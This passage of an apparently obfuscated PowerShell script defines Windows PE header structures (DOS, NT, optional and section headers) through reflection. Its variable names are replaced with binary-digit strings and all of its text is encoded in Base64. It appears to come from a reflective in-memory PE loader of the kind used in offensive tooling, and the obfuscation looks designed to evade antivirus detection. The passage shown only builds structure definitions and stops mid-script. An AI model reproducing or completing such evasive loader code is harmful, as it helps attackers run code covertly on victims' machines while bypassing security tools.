(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBBAFQA'))), ${00101010111001100}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(208) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RABlAGwAYQB5AEkAbQBwAG8AcgB0AEQAZQBzAGMAcgBpAHAAdABvAHIA'))), ${00101010111001100}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(216) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBMAFIAUgB1AG4AdABpAG0AZQBIAGUAYQBkAGUAcgA='))), ${00101010111001100}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(224) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UgBlAHMAZQByAHYAZQBkAA=='))), ${00101010111001100}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(232) | Out-Null
${01001111111000111} = ${10001111001010101}.CreateType()
$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_OPTIONAL_HEADER64 -Value ${01001111111000111}
${01001001010001110} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQB1AHQAbwBMAGEAeQBvAHUAdAAsACAAQQBuAHMAaQBDAGwAYQBzAHMALAAgAEMAbABhAHMAcwAsACAAUAB1AGIAbABpAGMALAAgAEUAeABwAGwAaQBjAGkAdABMAGEAeQBvAHUAdAAsACAAUwBlAGEAbABlAGQALAAgAEIAZQBmAG8AcgBlAEYAaQBlAGwAZABJAG4AaQB0AA==')))
${10001111001010101} = ${00101100111000111}.DefineType($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBNAEEARwBFAF8ATwBQAFQASQBPAE4AQQBMAF8ASABFAEEARABFAFIAMwAyAA=='))), ${01001001010001110}, [System.ValueType], 224)
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBhAGcAaQBjAA=='))), ${10011000111111001}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(0) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBhAGoAbwByAEwAaQBuAGsAZQByAFYAZQByAHMAaQBvAG4A'))), [Byte], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(2) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBpAG4AbwByAEwAaQBuAGsAZQByAFYAZQByAHMAaQBvAG4A'))), [Byte], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(3) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBpAHoAZQBPAGYAQwBvAGQAZQA='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(4) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBpAHoAZQBPAGYASQBuAGkAdABpAGEAbABpAHoAZQBkAEQAYQB0AGEA'))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(8) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBpAHoAZQBPAGYAVQBuAGkAbgBpAHQAaQBhAGwAaQB6AGUAZABEAGEAdABhAA=='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(12) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBkAGQAcgBlAHMAcwBPAGYARQBuAHQAcgB5AFAAbwBpAG4AdAA='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(16) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QgBhAHMAZQBPAGYAQwBvAGQAZQA='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(20) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QgBhAHMAZQBPAGYARABhAHQAYQA='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(24) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBtAGEAZwBlAEIAYQBzAGUA'))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(28) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBlAGMAdABpAG8AbgBBAGwAaQBnAG4AbQBlAG4AdAA='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(32) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RgBpAGwAZQBBAGwAaQBnAG4AbQBlAG4AdAA='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(36) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBhAGoAbwByAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtAFYAZQByAHMAaQBvAG4A'))), [UInt16], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(40) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBpAG4AbwByAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtAFYAZQByAHMAaQBvAG4A'))), [UInt16], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(42) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBhAGoAbwByAEkAbQBhAGcAZQBWAGUAcgBzAGkAbwBuAA=='))), [UInt16], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(44) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBpAG4AbwByAEkAbQBhAGcAZQBWAGUAcgBzAGkAbwBuAA=='))), [UInt16], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(46) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBhAGoAbwByAFMAdQBiAHMAeQBzAHQAZQBtAFYAZQByAHMAaQBvAG4A'))), [UInt16], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(48) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBpAG4AbwByAFMAdQBiAHMAeQBzAHQAZQBtAFYAZQByAHMAaQBvAG4A'))), [UInt16], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(50) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VwBpAG4AMwAyAFYAZQByAHMAaQBvAG4AVgBhAGwAdQBlAA=='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(52) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBpAHoAZQBPAGYASQBtAGEAZwBlAA=='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(56) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBpAHoAZQBPAGYASABlAGEAZABlAHIAcwA='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(60) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBoAGUAYwBrAFMAdQBtAA=='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(64) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwB1AGIAcwB5AHMAdABlAG0A'))), ${01011100100100011}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(68) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RABsAGwAQwBoAGEAcgBhAGMAdABlAHIAaQBzAHQAaQBjAHMA'))), ${01100101010001010}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(70) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBpAHoAZQBPAGYAUwB0AGEAYwBrAFIAZQBzAGUAcgB2AGUA'))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(72) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBpAHoAZQBPAGYAUwB0AGEAYwBrAEMAbwBtAG0AaQB0AA=='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(76) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBpAHoAZQBPAGYASABlAGEAcABSAGUAcwBlAHIAdgBlAA=='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(80) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBpAHoAZQBPAGYASABlAGEAcABDAG8AbQBtAGkAdAA='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(84) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TABvAGEAZABlAHIARgBsAGEAZwBzAA=='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(88) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TgB1AG0AYgBlAHIATwBmAFIAdgBhAEEAbgBkAFMAaQB6AGUAcwA='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(92) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RQB4AHAAbwByAHQAVABhAGIAbABlAA=='))), ${00101010111001100}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(96) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBtAHAAbwByAHQAVABhAGIAbABlAA=='))), ${00101010111001100}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(104) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UgBlAHMAbwB1AHIAYwBlAFQAYQBiAGwAZQA='))), ${00101010111001100}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(112) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RQB4AGMAZQBwAHQAaQBvAG4AVABhAGIAbABlAA=='))), ${00101010111001100}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(120) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBlAHIAdABpAGYAaQBjAGEAdABlAFQAYQBiAGwAZQA='))), ${00101010111001100}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(128) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QgBhAHMAZQBSAGUAbABvAGMAYQB0AGkAbwBuAFQAYQBiAGwAZQA='))), ${00101010111001100}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(136) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RABlAGIAdQBnAA=='))), ${00101010111001100}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(144) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQByAGMAaABpAHQAZQBjAHQAdQByAGUA'))), ${00101010111001100}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(152) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RwBsAG8AYgBhAGwAUAB0AHIA'))), ${00101010111001100}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(160) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VABMAFMAVABhAGIAbABlAA=='))), ${00101010111001100}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(168) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TABvAGEAZABDAG8AbgBmAGkAZwBUAGEAYgBsAGUA'))), ${00101010111001100}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(176) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QgBvAHUAbgBkAEkAbQBwAG8AcgB0AA=='))), ${00101010111001100}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(184) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBBAFQA'))), ${00101010111001100}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(192) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RABlAGwAYQB5AEkAbQBwAG8AcgB0AEQAZQBzAGMAcgBpAHAAdABvAHIA'))), ${00101010111001100}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(200) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBMAFIAUgB1AG4AdABpAG0AZQBIAGUAYQBkAGUAcgA='))), ${00101010111001100}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(208) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UgBlAHMAZQByAHYAZQBkAA=='))), ${00101010111001100}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(216) | Out-Null
${01100111011000001} = ${10001111001010101}.CreateType()
$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_OPTIONAL_HEADER32 -Value ${01100111011000001}
${01001001010001110} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQB1AHQAbwBMAGEAeQBvAHUAdAAsACAAQQBuAHMAaQBDAGwAYQBzAHMALAAgAEMAbABhAHMAcwAsACAAUAB1AGIAbABpAGMALAAgAFMAZQBxAHUAZQBuAHQAaQBhAGwATABhAHkAbwB1AHQALAAgAFMAZQBhAGwAZQBkACwAIABCAGUAZgBvAHIAZQBGAGkAZQBsAGQASQBuAGkAdAA=')))
${10001111001010101} = ${00101100111000111}.DefineType($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBNAEEARwBFAF8ATgBUAF8ASABFAEEARABFAFIAUwA2ADQA'))), ${01001001010001110}, [System.ValueType], 264)
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBpAGcAbgBhAHQAdQByAGUA'))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RgBpAGwAZQBIAGUAYQBkAGUAcgA='))), ${01000101100110000}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TwBwAHQAaQBvAG4AYQBsAEgAZQBhAGQAZQByAA=='))), ${01001111111000111}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${01111010111100011} = ${10001111001010101}.CreateType()
$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS64 -Value ${01111010111100011}
${01001001010001110} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQB1AHQAbwBMAGEAeQBvAHUAdAAsACAAQQBuAHMAaQBDAGwAYQBzAHMALAAgAEMAbABhAHMAcwAsACAAUAB1AGIAbABpAGMALAAgAFMAZQBxAHUAZQBuAHQAaQBhAGwATABhAHkAbwB1AHQALAAgAFMAZQBhAGwAZQBkACwAIABCAGUAZgBvAHIAZQBGAGkAZQBsAGQASQBuAGkAdAA=')))
${10001111001010101} = ${00101100111000111}.DefineType($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBNAEEARwBFAF8ATgBUAF8ASABFAEEARABFAFIAUwAzADIA'))), ${01001001010001110}, [System.ValueType], 248)
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBpAGcAbgBhAHQAdQByAGUA'))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RgBpAGwAZQBIAGUAYQBkAGUAcgA='))), ${01000101100110000}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TwBwAHQAaQBvAG4AYQBsAEgAZQBhAGQAZQByAA=='))), ${01100111011000001}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${00001000110101010} = ${10001111001010101}.CreateType()
$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS32 -Value ${00001000110101010}
${01001001010001110} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQB1AHQAbwBMAGEAeQBvAHUAdAAsACAAQQBuAHMAaQBDAGwAYQBzAHMALAAgAEMAbABhAHMAcwAsACAAUAB1AGIAbABpAGMALAAgAFMAZQBxAHUAZQBuAHQAaQBhAGwATABhAHkAbwB1AHQALAAgAFMAZQBhAGwAZQBkACwAIABCAGUAZgBvAHIAZQBGAGkAZQBsAGQASQBuAGkAdAA=')))
${10001111001010101} = ${00101100111000111}.DefineType($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBNAEEARwBFAF8ARABPAFMAXwBIAEUAQQBEAEUAUgA='))), ${01001001010001110}, [System.ValueType], 64)
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('ZQBfAG0AYQBnAGkAYwA='))), [UInt16], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('ZQBfAGMAYgBsAHAA'))), [UInt16], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('ZQBfAGMAcAA='))), [UInt16], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('ZQBfAGMAcgBsAGMA'))), [UInt16], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('ZQBfAGMAcABhAHIAaABkAHIA'))), [UInt16], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('ZQBfAG0AaQBuAGEAbABsAG8AYwA='))), [UInt16], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('ZQBfAG0AYQB4AGEAbABsAG8AYwA='))), [UInt16], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('ZQBfAHMAcwA='))), [UInt16], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('ZQBfAHMAcAA='))), [UInt16], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('ZQBfAGMAcwB1AG0A'))), [UInt16], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('ZQBfAGkAcAA='))), [UInt16], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('ZQBfAGMAcwA='))), [UInt16], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('ZQBfAGwAZgBhAHIAbABjAA=='))), [UInt16], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('ZQBfAG8AdgBuAG8A'))), [UInt16], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${01110001001010011} = ${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('ZQBfAHIAZQBzAA=='))), [UInt16[]], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMALAAgAEgAYQBzAEYAaQBlAGwAZABNAGEAcgBzAGgAYQBsAA=='))))
${10000110100001011} = [System.Runtime.InteropServices.UnmanagedType]::ByValArray
${10110100110001110} = @([System.Runtime.InteropServices.MarshalAsAttribute].GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBpAHoAZQBDAG8AbgBzAHQA')))))
${10001000110011000} = New-Object System.Reflection.Emit.CustomAttributeBuilder(${10101111111100000}, ${10000110100001011}, ${10110100110001110}, @([Int32] 4))
${01110001001010011}.SetCustomAttribute(${10001000110011000})
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('ZQBfAG8AZQBtAGkAZAA='))), [UInt16], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('ZQBfAG8AZQBtAGkAbgBmAG8A'))), [UInt16], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${01111110100000001} = ${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('ZQBfAHIAZQBzADIA'))), [UInt16[]], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMALAAgAEgAYQBzAEYAaQBlAGwAZABNAGEAcgBzAGgAYQBsAA=='))))
${10000110100001011} = [System.Runtime.InteropServices.UnmanagedType]::ByValArray
${10001000110011000} = New-Object System.Reflection.Emit.CustomAttributeBuilder(${10101111111100000}, ${10000110100001011}, ${10110100110001110}, @([Int32] 10))
${01111110100000001}.SetCustomAttribute(${10001000110011000})
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('ZQBfAGwAZgBhAG4AZQB3AA=='))), [Int32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${00000110010110011} = ${10001111001010101}.CreateType()
$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_DOS_HEADER -Value ${00000110010110011}
${01001001010001110} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQB1AHQAbwBMAGEAeQBvAHUAdAAsACAAQQBuAHMAaQBDAGwAYQBzAHMALAAgAEMAbABhAHMAcwAsACAAUAB1AGIAbABpAGMALAAgAFMAZQBxAHUAZQBuAHQAaQBhAGwATABhAHkAbwB1AHQALAAgAFMAZQBhAGwAZQBkACwAIABCAGUAZgBvAHIAZQBGAGkAZQBsAGQASQBuAGkAdAA=')))
${10001111001010101} = ${00101100111000111}.DefineType($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBNAEEARwBFAF8AUwBFAEMAVABJAE8ATgBfAEgARQBBAEQARQBSAA=='))), ${01001001010001110}, [System.ValueType], 40)
${01001111000010010} = ${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TgBhAG0AZQA='))), [Char[]], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMALAAgAEgAYQBzAEYAaQBlAGwAZABNAGEAcgBzAGgAYQBsAA=='))))
${10000110100001011} = [System.Runtime.InteropServices.UnmanagedType]::ByValArray
${10001000110011000} = New-Object System.Reflection.Emit.CustomAttributeBuilder(${10101111111100000}, ${10000110100001011}, ${10110100110001110}, @([Int32] 8))
${01001111000010010}.SetCustomAttribute(${10001000110011000})
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VgBpAHIAdAB1AGEAbABTAGkAegBlAA=='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VgBpAHIAdAB1AGEAbABBAGQAZAByAGUAcwBzAA=='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBpAHoAZQBPAGYAUgBhAHcARABhAHQAYQA='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UABvAGkAbgB0AGUAcgBUAG8AUgBhAHcARABhAHQAYQA='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
